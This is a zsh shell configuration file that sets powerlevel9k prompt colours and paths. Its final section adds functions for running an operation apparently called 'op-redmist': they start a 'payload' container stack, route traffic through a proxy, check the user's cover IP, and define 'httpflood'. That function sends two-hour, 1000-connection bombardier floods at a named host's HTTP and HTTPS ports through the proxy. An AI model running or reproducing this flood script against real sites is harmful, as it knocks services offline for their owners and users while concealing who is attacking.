#!/bin/zsh
export TERM="xterm-256color"
export ZSH=$HOME/.oh-my-zsh

ZSH_THEME='powerlevel9k/powerlevel9k'

POWERLEVEL9K_PROMPT_ON_NEWLINE=true
POWERLEVEL9K_MODE='awesome-patched'
POWERLEVEL9K_LEFT_PROMPT_ELEMENTS=('os_icon' 'context' 'dir' 'vcs')
POWERLEVEL9K_RIGHT_PROMPT_ELEMENTS=('status' 'rvm' 'time')
POWERLEVEL9K_CONTEXT_FOREGROUND='black'

POWERLEVEL9K_OS_ICON_BACKGROUND="black"
POWERLEVEL9K_OS_ICON_FOREGROUND="249"
POWERLEVEL9K_TODO_BACKGROUND="black"
POWERLEVEL9K_TODO_FOREGROUND="249"
POWERLEVEL9K_DIR_HOME_BACKGROUND="black"
POWERLEVEL9K_DIR_HOME_FOREGROUND="249"
POWERLEVEL9K_DIR_HOME_SUBFOLDER_BACKGROUND="black"
POWERLEVEL9K_DIR_HOME_SUBFOLDER_FOREGROUND="249"
POWERLEVEL9K_DIR_DEFAULT_BACKGROUND="black"
POWERLEVEL9K_DIR_DEFAULT_FOREGROUND="249"
POWERLEVEL9K_STATUS_OK_BACKGROUND="black"
POWERLEVEL9K_STATUS_OK_FOREGROUND="green"
POWERLEVEL9K_STATUS_ERROR_BACKGROUND="black"
POWERLEVEL9K_STATUS_ERROR_FOREGROUND="red"
POWERLEVEL9K_NVM_BACKGROUND="black"
POWERLEVEL9K_NVM_FOREGROUND="249"
POWERLEVEL9K_NVM_VISUAL_IDENTIFIER_COLOR="green"
POWERLEVEL9K_RVM_BACKGROUND="black"
POWERLEVEL9K_RVM_FOREGROUND="249"
POWERLEVEL9K_RVM_VISUAL_IDENTIFIER_COLOR="red"
POWERLEVEL9K_LOAD_CRITICAL_BACKGROUND="black"
POWERLEVEL9K_LOAD_WARNING_BACKGROUND="black"
POWERLEVEL9K_LOAD_NORMAL_BACKGROUND="black"
POWERLEVEL9K_LOAD_CRITICAL_FOREGROUND="249"
POWERLEVEL9K_LOAD_WARNING_FOREGROUND="249"
POWERLEVEL9K_LOAD_NORMAL_FOREGROUND="249"
POWERLEVEL9K_LOAD_CRITICAL_VISUAL_IDENTIFIER_COLOR="red"
POWERLEVEL9K_LOAD_WARNING_VISUAL_IDENTIFIER_COLOR="yellow"
POWERLEVEL9K_LOAD_NORMAL_VISUAL_IDENTIFIER_COLOR="green"
POWERLEVEL9K_RAM_BACKGROUND="black"
POWERLEVEL9K_RAM_FOREGROUND="249"
POWERLEVEL9K_RAM_ELEMENTS=(ram_free)
POWERLEVEL9K_BATTERY_LOW_BACKGROUND="black"
POWERLEVEL9K_BATTERY_CHARGING_BACKGROUND="black"
POWERLEVEL9K_BATTERY_CHARGED_BACKGROUND="black"
POWERLEVEL9K_BATTERY_DISCONNECTED_BACKGROUND="black"
POWERLEVEL9K_BATTERY_LOW_FOREGROUND="249"
POWERLEVEL9K_BATTERY_CHARGING_FOREGROUND="249"
POWERLEVEL9K_BATTERY_CHARGED_FOREGROUND="249"
POWERLEVEL9K_BATTERY_DISCONNECTED_FOREGROUND="249"
POWERLEVEL9K_BATTERY_LOW_VISUAL_IDENTIFIER_COLOR="red"
POWERLEVEL9K_BATTERY_CHARGING_VISUAL_IDENTIFIER_COLOR="yellow"
POWERLEVEL9K_BATTERY_CHARGED_VISUAL_IDENTIFIER_COLOR="green"
POWERLEVEL9K_BATTERY_DISCONNECTED_VISUAL_IDENTIFIER_COLOR="249"
POWERLEVEL9K_TIME_BACKGROUND="black"
POWERLEVEL9K_TIME_FOREGROUND="249"

DISABLE_UPDATE_PROMPT=true
ENABLE_CORRECTION="true"
HISTFILESIZE=20000
plugins=(git)

# User configuration
export NOW=$(date +"%H-%M-%d-%m-%Y")
source $ZSH/oh-my-zsh.sh

export PATH="$PATH:$HOME/.rvm/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin:/sbin:/usr/local/go/bin"
export GOPATH=$HOME/work

eval $(ssh-agent)

startpayload () {
  docker-compose -f ~/op-redmist/payload.yml up -d
}
stoppayload () {
  docker-compose -f ~/op-redmist/payload.yml down
}

proxyon () {
  export http_proxy="127.0.0.1:8118"
}
proxyoff () {
  stoppayload
  unset http_proxy
}

whatismycover () {
  whois $(curl -s api.ipify.org)
}

httpflood () {
  host=$1
  ip=$2
  http="down"
  https="down"
  args="-c 1000 -n 100000000 --http1 --rate 300 -k -d 2h"

  if curl -ILks --max-time 20 https://$host ; then
   echo "Still up"
   https="up"
  fi
  if curl -ILks --max-time 20 http://$host ; then
   echo "Still up"
   http="up"
  fi

  docker rm -f httpflood-$host-$ip-80 || true
  docker rm -f httpflood-$host-$ip-443 || true

  if [[ "$http" -eq "up" ]] ; then
  docker run -d --rm --name=httpflood-$host-$ip-80 --network=op-redmist_load -e http_proxy='privoxy:8118' --entrypoint=/bin/sh magihax/bombardier:latest -c "bombardier ${args} --header=\"Host: $host\" http://$ip:80"
  fi
  if [[ "$https" -eq "up" ]] ; then
  docker run -d --rm --name=httpflood-$host-$ip-443 --network=op-redmist_load -e http_proxy='privoxy:8118' --entrypoint=/bin/sh magihax/bombardier:latest -c "bombardier ${args} --header=\"Host: $host\" https://$ip:443"
  fi
}

stophttpflood () {
  docker rm -f $(docker ps -f name=httpflood* -q)
}

proxyon